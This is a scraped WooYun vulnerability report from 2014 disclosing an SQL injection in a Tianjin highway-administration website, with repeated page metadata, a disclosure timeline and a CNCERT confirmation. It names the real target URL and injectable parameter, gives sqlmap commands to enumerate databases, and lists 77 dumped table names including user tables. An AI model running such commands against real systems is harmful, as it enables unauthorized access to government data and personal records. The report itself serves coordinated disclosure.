天津市某公路系统SQL注入 | wooyun-2014-062125| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-062125

漏洞标题：天津市某公路系统SQL注入

漏洞作者：冰火九天

提交时间：2014-05-27 10:34

修复时间：2014-07-11 10:36

公开时间：2014-07-11 10:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-27：细节已通知厂商并且等待厂商处理中
2014-05-30：厂商已经确认，细节仅向厂商公开
2014-06-09：细节向核心白帽子及相关领域专家公开
2014-06-19：细节向普通白帽子公开
2014-06-29：细节向实习白帽子公开
2014-07-11：细节向公众公开

简要描述：

天津市某公路系统SQL注入

详细说明：

问题url：
http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1

sqlmap -u "http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1" -p "id"

列个数据库

sqlmap -u "http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1" -p "id" --dbs

当前数据库

sqlmap -u "http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1" -p "id" --current-db

列个表

Database: TT                                                                   
[77 tables]
+------------------+
| ABOUTWWW         |
| APPOINT_USER     |
| APPOINT_USER_HIS |
| ARRAY            |
| ATTACHMENT       |
| BIDFILEAPPROVE   |
| BIDINFO          |
| BIDSEGINFO       |
| BIDTYPEINFO      |
| BYINFO           |
| CL00000001       |
| CL00000002       |
| CL00000003       |
| CL00000004       |
| CL00000005       |
| CL00000005_SUB   |
| CL00000006       |
| CL00000007       |
| CL00000008       |
| CL00000009       |
| CL05000001       |
| CL05000002       |
| CL05000003       |
| CL07000001       |
| CL07000002       |
| CL07000002_SUB   |
| CL07000003       |
| CL07000003_SUB   |
| CL08000001       |
| CL08000002       |
| CL08000002_SUB   |
| CL08000003       |
| CL08000003_SUB   |
| CL08000004       |
| CL09000001       |
| CL09000002       |
| CL09000002_SUB   |
| CL09000003       |
| CL09000003_SUB   |
| CL10000001       |
| CL10000002       |
| CL10000002_SUB   |
| CL10000003       |
| CL10000003_SUB   |
| CL20000001       |
| CL20000002       |
| CL20000002_SUB   |
| CL20000003       |
| CL20000003_SUB   |
| CREDIT_RESULT    |
| ENROLLINFO       |
| ENROLL_DBGC      |
| ENROLL_ZYRY      |
| ENROLL_ZYRYYJ    |
| ENROLL_ZZXX      |
| ERP_PERSON       |
| ERP_PERSON_SUB   |
| ERP_PERSON_ZZ    |
| IBIDNOTICE       |
| INFOLOAD         |
| PJ_ACTIONUP      |
| PJ_BAD_BEHAVIOR  |
| PJ_INDICATOR     |
| PJ_INDTYPE       |
| PJ_NUM           |
| PJ_TEMPLATE      |
| POLICIES         |
| PROJECT          |
| SB_NUM           |
| SEGEXPERTREG     |
| TZSNOTICE        |
| USERS            |
| USERS_PRIVATE    |
| USER_ROLE        |
| WBIDNOTICE       |
| WBIDNOTICE_SUB   |
| WORKSTATE        |
+------------------+

漏洞证明：

如上

修复方案：

参数过滤

版权声明：转载请注明来源冰火九天@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-05-30 17:47

厂商回复：

CNVD确认并复现所述情况，转由CNCERT下发天津分中心通报处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-062125

漏洞标题：天津市某公路系统SQL注入

相关厂商：天津市

漏洞作者：冰火九天

提交时间：2014-05-27 10:34

修复时间：2014-07-11 10:36

公开时间：2014-07-11 10:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源冰火九天@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-062125

漏洞标题：天津市某公路系统SQL注入

相关厂商：天津市

漏洞作者： 冰火九天

提交时间：2014-05-27 10:34

修复时间：2014-07-11 10:36

公开时间：2014-07-11 10:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-062125"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 冰火九天@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：冰火九天

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源冰火九天@乌云